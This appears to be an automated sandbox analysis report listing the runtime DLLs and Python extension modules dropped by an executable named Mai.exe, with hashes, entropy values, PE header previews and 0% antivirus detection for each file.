                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):109440
                                                          Entropy (8bit):6.642252418996898
                                                          Encrypted:false
                                                          SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                                          MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                                          SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                                          SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                                          SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):49560
                                                          Entropy (8bit):6.6649899041961875
                                                          Encrypted:false
                                                          SSDEEP:768:a0Q4HUcGJZekJSam1BbuBSYcCZbiLzlSHji9z4GwZHji9znwT:afnDex5izbiLzlE+z4Gwl+zwT
                                                          MD5:CF0A1C4776FFE23ADA5E570FC36E39FE
                                                          SHA1:2050FADECC11550AD9BDE0B542BCF87E19D37F1A
                                                          SHA-256:6FD366A691ED68430BCD0A3DE3D8D19A0CB2102952BFC140BBEF4354ED082C47
                                                          SHA-512:D95CD98D22CA048D0FC5BCA551C9DB13D6FA705F6AF120BBBB621CF2B30284BFDC7320D0A819BB26DAB1E0A46253CC311A370BED4EF72ECB60C69791ED720168
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V...V...V......T.......T..._.D.]...V...e.......S.......Q.......M.......W.....(.W.......W...RichV...........PE..d...}.4..........." ...$.<...8.......A..............................................e4....`A........................................0m.......m..x....................r...O......D....c..p...........................pb..@............P..h............................text...@:.......<.................. ..`.rdata..."...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_asyncio.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):65304
                                                          Entropy (8bit):6.187244032149753
                                                          Encrypted:false
                                                          SSDEEP:1536:92icaMc9076gzE6+gTKnEzRIsOnev7SyP4xw:92icrclGE6+gTOEzRIsOn2V
                                                          MD5:511A52BCB0BD19EDA7AA980F96723C93
                                                          SHA1:B11AB01053B76EBB60AB31049F551E5229E68DDD
                                                          SHA-256:D1FB700F280E7793E9B0DCA33310EF9CD08E9E0EC4F7416854DFFAF6F658A394
                                                          SHA-512:D29750950DB2ECBD941012D7FBDD74A2BBD619F1A92616A212ACB144DA75880CE8A29EC3313ACBC419194219B17612B27A1833074BBBAA291CDB95B05F8486FF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.i..i..i......i.v.h..i.v.l..i.v.m..i.v.j..i...h..i...h..i..h.V.i...d..i...i..i.....i...k..i.Rich.i.........................PE..d....k.d.........." ...$.R..........`...............................................'.....`.............................................P...`...d......................../..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_bz2.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):84760
                                                          Entropy (8bit):6.571366239395909
                                                          Encrypted:false
                                                          SSDEEP:1536:+O1z7poK78xa5yp6aclDqGihM8Vh948L5IsCVQ7SyhxG:31z9h9plDshvVhH5IsCVQk
                                                          MD5:4438AFFAAA0CA1DF5B9B1CDAA0115EC1
                                                          SHA1:4EDA79EAF3DE614D5F744AA9EEA5BFCF66E2D386
                                                          SHA-256:EC91E2B4BACA31B992D016B84B70F110CE2B1B2DFD54F5E5BEF6270ED7D13B85
                                                          SHA-512:6992107AC4D2108E477BC81AF667B8B8E5439231E7E9F4B15CE4BCE1AEEA811BC0F1AAA438BE3B0E38597760CB504367512809EE1937C4B538A86724AE543BA6
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B......B.i.C...B.i.....B.i.G...B.i.F...B.i.A...B..C...B..C...B...C..B..O...B..B...B......B..@...B.Rich..B.........................PE..d....k.d.........." ...$.....^...............................................P......2.....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_cffi_backend.cp311-win_amd64.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):181248
                                                          Entropy (8bit):6.186854863391558
                                                          Encrypted:false
                                                          SSDEEP:3072:nmHfhrWGYV6sewRdFRId6PBNKcqDn/C1j/UyS7viSTLkKxalPu//ay/i:nmprWX6sPRNPBAn/0/dCiSTLL0P2/ay
                                                          MD5:210DEF84BB2C35115A2B2AC25E3FFD8F
                                                          SHA1:0376B275C81C25D4DF2BE4789C875B31F106BD09
                                                          SHA-256:59767B0918859BEDDF28A7D66A50431411FFD940C32B3E8347E6D938B60FACDF
                                                          SHA-512:CD5551EB7AFD4645860C7EDD7B0ABD375EE6E1DA934BE21A6099879C8EE3812D57F2398CAD28FBB6F75BBA77471D9B32C96C7C1E9D3B4D26C7FC838745746C7F
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........ ..MA.CMA.CMA.CD9MCAA.C.4.BOA.C+.#CIA.C.4.BFA.C.4.BEA.C.4.BIA.C.9.BIA.C.=.BNA.CMA.C.A.C.4.BIA.CD9KCLA.C.4.BLA.C.4!CLA.C.4.BLA.CRichMA.C........................PE..d...,..e.........." .........@..............................................0............`..........................................g..l...|g..................<............ .......M...............................M..8............................................text............................... ..`.rdata..l...........................@..@.data....\.......0...v..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_ctypes.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):123672
                                                          Entropy (8bit):6.0603476725812415
                                                          Encrypted:false
                                                          SSDEEP:3072:T7u5LnIxdP3fPHW+gfLIhAxKpemWtIsLPKlY:Tw+3FgfLIhFemWeY
                                                          MD5:6114277C6FC040F68D25CA90E25924CD
                                                          SHA1:028179C77CB3BA29CD8494049421EAA4900CCD0E
                                                          SHA-256:F07FE92CE85F7786F96A4D59C6EE5C05FE1DB63A1889BA40A67E37069639B656
                                                          SHA-512:76E8EBEFB9BA4EA8DCAB8FCE50629946AF4F2B3F2F43163F75483CFB0A97968478C8AAEF1D6A37BE85BFC4C91A859DEDA6DA21D3E753DAEFE084A203D839353D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...M.".B......F......H......L......@...^..F......E......B......G...D.......^..B...^..E...^.N.E...^..E...RichD...........PE..d....k.d.........." ...$............p\..............................................[.....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_decimal.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):253720
                                                          Entropy (8bit):6.554150968006557
                                                          Encrypted:false
                                                          SSDEEP:6144:3V9E1CyOa72oP+pG1/dgD09qWM53pLW1ADDtLRO75e:jEgyOa72jw1/d4VVhLE5e
                                                          MD5:BE315973AFF9BDEB06629CD90E1A901F
                                                          SHA1:151F98D278E1F1308F2BE1788C9F3B950AB88242
                                                          SHA-256:0F9C6CC463611A9B2C692382FE1CDD7A52FEA4733FFAF645D433F716F8BBD725
                                                          SHA-512:8EA715438472E9C174DEE5ECE3C7D9752C31159E2D5796E5229B1DF19F87316579352FC3649373DB066DC537ADF4869198B70B7D4D1D39AC647DA2DD7CFC21E8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.`...`...`.......`..,....`..,....`..,....`..,....`.......`.......`...`...`.......`.......`.......`....r..`.......`..Rich.`..........................PE..d....k.d.........." ...$.x...<......|...............................................>.....`.........................................0T..P....T...................'......./......P.......T...........................p...@............................................text...-w.......x.................. ..`.rdata..|............|..............@..@.data....*...p...$...T..............@....pdata...'.......(...x..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_hashlib.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):65304
                                                          Entropy (8bit):6.256836184121913
                                                          Encrypted:false
                                                          SSDEEP:1536:nfKlLLgy209/MkZy6nR3JZlivy7OjZopRIsOI/7SyAxn4:fKBgy+IZlh7OjSpRIsOI/M4
                                                          MD5:1524882AF71247ADECF5815A4E55366A
                                                          SHA1:E25014C793C53503BDFF9AF046140EDDA329D01B
                                                          SHA-256:6F7742DFDD371C39048D775F37DF3BC2D8D4316C9008E62347B337D64EBED327
                                                          SHA-512:5B954BB7953F19AA6F7C65AD3F105B77D37077950FB1B50D9D8D337BDD4B95343BAC2F4C9FE17A02D1738D1F87EEEF73DBBF5CDDDCB470588CBC5A63845B188A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,'@.MI..MI..MI..5...MI.:3H..MI.:3L..MI.:3M..MI.:3J..MI..2H..MI..5H..MI.G0H..MI..MH..MI..2D..MI..2I..MI..2...MI..2K..MI.Rich.MI.........PE..d....l.d.........." ...$.T...~......@@...............................................7....`............................................P... ............................/......X...P}..T............................|..@............p..0............................text....S.......T.................. ..`.rdata...O...p...P...X..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_lzma.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):159000
                                                          Entropy (8bit):6.8491410545695715
                                                          Encrypted:false
                                                          SSDEEP:3072:2tZVL5rdV/REWWjAYyznf49mNo+RRApqc5IsZ1v8N:2tZV3pREMAYO+ElG
                                                          MD5:737119A80303EF4ECCAA998D500E7640
                                                          SHA1:328C67C6C4D297AC13DA725BF24467D8B5E982E3
                                                          SHA-256:7158C1290AC29169160B3EC94D9C8BCDE4012D67A555F325D44B418C54E2CC28
                                                          SHA-512:1C9920E0841A65B01A0B339C5F5254D1039EF9A16FE0C2484A7E2A9048727F2CC081817AA771B0C574FB8D1A5A49DC39798A3C5E5B5E64392E9C168E1827BE7C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..'..lt..lt..lt...t..lt..mu..lt..iu..lt..hu..lt..ou..lt..mu..ltM.mu..lt..mt`.lt..au<.lt..lu..lt..t..lt..nu..ltRich..lt................PE..d....l.d.........." ...$.b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text...za.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_multiprocessing.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34584
                                                          Entropy (8bit):6.410940768849398
                                                          Encrypted:false
                                                          SSDEEP:768:hXI6RwgJ5xeDTdywGnJ8BIsWt6F5YiSyvWKAMxkE9:pIoJ5UDTdywGJ8BIsWt6L7SyuoxB
                                                          MD5:2CA9FE51BF2EE9F56F633110A08B45CD
                                                          SHA1:88BA6525C71890A50F07547A5E9EAD0754DD85B9
                                                          SHA-256:1D6F1E7E9F55918967A37CBD744886C2B7EE193C5FB8F948132BA40B17119A81
                                                          SHA-512:821551FA1A5AA21F76C4AE05F44DDD4C2DAA00329439C6DADC861931FA7BD8E464B4441DFE14383F2BB30C2FC2DFB94578927615B089A303AA39240E15E89DE5
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G.*.&.y.&.y.&.y.^.y.&.yFX.x.&.yFX.x.&.yFX.x.&.yFX.x.&.y.Y.x.&.y.&.y.&.y.^.x.&.y.Y.x.&.y.Y.x.&.y.Y}y.&.y.Y.x.&.yRich.&.y........PE..d....k.d.........." ...$.....<......0.....................................................`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_overlapped.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50968
                                                          Entropy (8bit):6.433137711787963
                                                          Encrypted:false
                                                          SSDEEP:768:A1MCcP4W1vqJiR5RMJl5XikC6r2lIsXtw5YiSyvUYAMxkEb:A1MiJifvkCllIsXti7SysGxf
                                                          MD5:AC053EF737E4F13B02BFA81F9E46170B
                                                          SHA1:5D8EBEB30671B74D736731696FEDC78C89DA0E1F
                                                          SHA-256:CB68E10748E2EFD86F7495D647A2774CEA9F97AD5C6FE179F90DC1C467B9280F
                                                          SHA-512:6AC26F63981DC5E8DFB675880D6C43648E2BBE6711C75DCAC20EBE4D8591E88FBFAC3C60660AB28602352760B6F5E1CB587075072ABD3333522E3E2549BFA02E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{.wo(.wo(.wo(...(.wo(..n).wo(..j).wo(..k).wo(..l).wo(..n).wo(.wn(.wo(..n).wo(..k).wo(..b).wo(..o).wo(...(.wo(..m).wo(Rich.wo(........................PE..d....k.d.........." ...$.B...X............................................................`.........................................0...X................................/......,....f..T...........................Pe..@............`...............................text...^A.......B.................. ..`.rdata..$5...`...6...F..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_queue.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32536
                                                          Entropy (8bit):6.452372346765785
                                                          Encrypted:false
                                                          SSDEEP:768:K+yFV6rXMmxU9tIsQUl5YiSyvYAMxkEl1C:K+wEXMWU9tIsQUr7SyexXC
                                                          MD5:8BBED19359892F8C95C802C6AD7598E9
                                                          SHA1:773FCA164965241F63170E7A1F3A8FA17F73EA18
                                                          SHA-256:4E5B7C653C1B3DC3FD7519E4F39CC8A2FB2746E0ECDC4E433FE6029F5F4D9065
                                                          SHA-512:22EA7667689A9F049FA34DDAE6B858E1AF3E646A379D2C5A4AEF3E74A4FF1A4109418B363C9BE960127F1C7E020AA393A47885BC45517C9E9AEBE71EC7CB61A0
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7X.Y..Y..Y......Y.v.X..Y.v.\..Y.v.]..Y.v.Z..Y...X..Y...X..Y..X...Y...T..Y...Y..Y.....Y...[..Y.Rich.Y.........................PE..d....k.d.........." ...$.....8............................................................`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_socket.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):79640
                                                          Entropy (8bit):6.290503224602847
                                                          Encrypted:false
                                                          SSDEEP:1536:zbflGOzI+Jmrc0r3uj+9/s+S+pzpDAiTFVf78tIsLwy7SyJx+:V/IMA3uj+9/sT+pztAYFVT8tIsLwyA
                                                          MD5:64A6C475F59E5C57B3F4DD935F429F09
                                                          SHA1:CA2E0719DC32F22163AE0E7B53B2CAADB0B9D023
                                                          SHA-256:D03FA645CDE89B4B01F4A2577139FBB7E1392CB91DC26213B3B76419110D8E49
                                                          SHA-512:CF9E03B7B34CC095FE05C465F9D794319AAA0428FE30AB4DDCE14BA78E835EDF228D11EC016FD31DFE9F09D84B6F73482FB8E0F574D1FD08943C1EC9E0584973
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.......e..N....e..N....e..N....e..N....e.......e...e..Re.......e.......e.......e....{..e.......e..Rich.e..................PE..d....l.d.........." ...$.l...........%.......................................P......e]....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...6k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_sqlite3.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):120088
                                                          Entropy (8bit):6.257365630046476
                                                          Encrypted:false
                                                          SSDEEP:3072:hZ1UnKJVckfKE0izBCL1F4TSlNdtAhfw5ySJQVMJFcV4qsSxRIsOQZm:hcnoVckfqjb5XJF1a4
                                                          MD5:A7DF575BF69570944B004DFE150E8CAF
                                                          SHA1:2FD19BE98A07347D59AFD78C167601479AAC94BB
                                                          SHA-256:B1223420E475348C0BFB90FAE33FC44CE35D988270294158EC366893DF221A4B
                                                          SHA-512:18C381A4DED8D33271CBF0BEA75AF1C86C6D34CC436F68FB9342951C071C10D84CF9F96A0509C53E5886D47FED5BCA113A7F7863F6873583DAA7BB6AF1AA9AFA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..O..O..O.....O.p.N..O.p...O.p.J..O.p.K..O.p.L..O...N..O...N..O..N..O...B..O...O..O.....O...M..O.Rich.O.................PE..d....l.d.........." ...$............`...............................................7&....`..........................................Z..P....Z.........................../..............T...............................@............................................text............................... ..`.rdata..l...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\_ssl.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):176920
                                                          Entropy (8bit):5.954664688637172
                                                          Encrypted:false
                                                          SSDEEP:3072:LFIQQShnmJg0ADm8H4qIOuXo6XHFBN9d41Olh59YL48PMrN/WgAlNzn5IsC7/1a:GShmaJDm24q6o6XHR4BLrT
                                                          MD5:A0B40F1F8FC6656C5637EACACF7021F6
                                                          SHA1:38813E25FFDE1EEE0B8154FA34AF635186A243C1
                                                          SHA-256:79D861F0670828DEE06C2E3523E2F9A2A90D6C6996BDE38201425AA4003119F1
                                                          SHA-512:C18855D7C0069FFF392D422E5B01FC518BBDF497EB3390C0B333ECAC2497CD29ABBDAE4557E4F0C4E90321FBA910FC3E4D235CE62B745FA34918F40FA667B713
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@.L.@.L.@.L.8$L.@.L.>.M.@.L.>.M.@.L.>.M.@.L.>.M.@.L.?.M.@.Lw=.M.@.L.@.L A.L.8.M.@.L.?.M.@.L.?.M.@.L.?HL.@.L.?.M.@.LRich.@.L........PE..d....l.d.........." ...$............l+....................................................`.........................................0...d................................/......|...P...T...............................@............................................text............................... ..`.rdata...".......$..................@..@.data...............................@....pdata...............\..............@..@.rsrc................h..............@..@.reloc..|............r..............@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-console-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.830867642122176
                                                          Encrypted:false
                                                          SSDEEP:192:WfBWfhWooeWvcuyjS7HnhWgN7a8WhlZGh+Il+jX01k9z3ARCvXD8N:W5WfhWd7HRN7sOEjR9zSSG
                                                          MD5:71405F0BA5D7DA5A5F915F33667786DE
                                                          SHA1:BB5CDF9C12FE500251CF98F0970A47B78C2F8B52
                                                          SHA-256:0099F17128D1551A47CBD39CE702D4ACC4B49BE1BB1CFE974FE5A42DA01D88EB
                                                          SHA-512:B2C6438541C4FA7AF3F8A9606F64EEEF5D77DDBC0689E7501074BB72B7CC907A8461A75089E5B70B881BC3B1BE009888FF25EA866FAAF1C49DD521027041295A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0......c.....`.........................................`...,............ ...................'..............T............................................................................rdata..,...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-datetime-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.838675218358012
                                                          Encrypted:false
                                                          SSDEEP:192:WTWfhWKkeWvcuyjS7HnhWgN7a8WhaYah+Il+jX01k9z3ARiuXLL1w:WTWfhWN7HRN7ISEjR9zS/f2
                                                          MD5:A17D27E01478C17B88794FD0F79782FC
                                                          SHA1:2B8393E7B37FB990BE2CDC82803CA49B4CEF8546
                                                          SHA-256:AC227773908836D54C8FC06C4B115F3BDFC82E4D63C7F84E1F8E6E70CD066339
                                                          SHA-512:DDC6DDA49D588F22C934026F55914B31E53079E044DEC7B4F1409668DBFE8885B887CC64A411D44F83BC670AC8A8B6D3AD030D4774EF7BF522F1D3BC00E07485
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....o*..........." .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-debug-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.843944025237199
                                                          Encrypted:false
                                                          SSDEEP:192:W/WfhWJeWvcuyjS7HnhWgN7a8WhpaWGaN4NhrJgX01k9z3An9PLLIh:W/WfhWJ7HRN7svTN4tgR9zYxi
                                                          MD5:E485C1C5F33AD10EEC96E2CDBDDFF3C7
                                                          SHA1:31F6BA9BECA535F2FB7FFB755B7C5C87AC8D226C
                                                          SHA-256:C734022B165B3BA6F8E28670C4190A65C66EC7ECC961811A6BDCD9C7745CAC20
                                                          SHA-512:599036D8FA2E916491BEDB5BB49B94458A09DDDD2908CF770E94BB0059730598EC5A9B0507E6A21209E2DCAE4D74027313DF87C9AB51FAD66B1D07903BAE0B35
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....r.r.........." .........................................................0......y.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-errorhandling-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.890661662475156
                                                          Encrypted:false
                                                          SSDEEP:192:WgmxD3JbDWfhWqjeWvcuyjS7HnhWgN7aUWh1kG1q21eX01k9z3ABfNBnJbIx:WgAbDWfhWo7HRN74l1l8R9zmfNBlg
                                                          MD5:0FFB34C0C2CDEC47E063C5E0C96B9C3F
                                                          SHA1:9716643F727149B953F64B3E1EB6A9F2013EAC9C
                                                          SHA-256:863A07D702717CF818A842AF0B4E1DFD6E723F712E49BF8C3AF3589434A0AE80
                                                          SHA-512:4311D582856D9C3CAC2CDC6A9DA2137DF913BCF69041015FD272C2780F6AB850895DEB69279A076376A2E6401C907CB23A3052960478A6CF4B566A20CCE61BD1
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
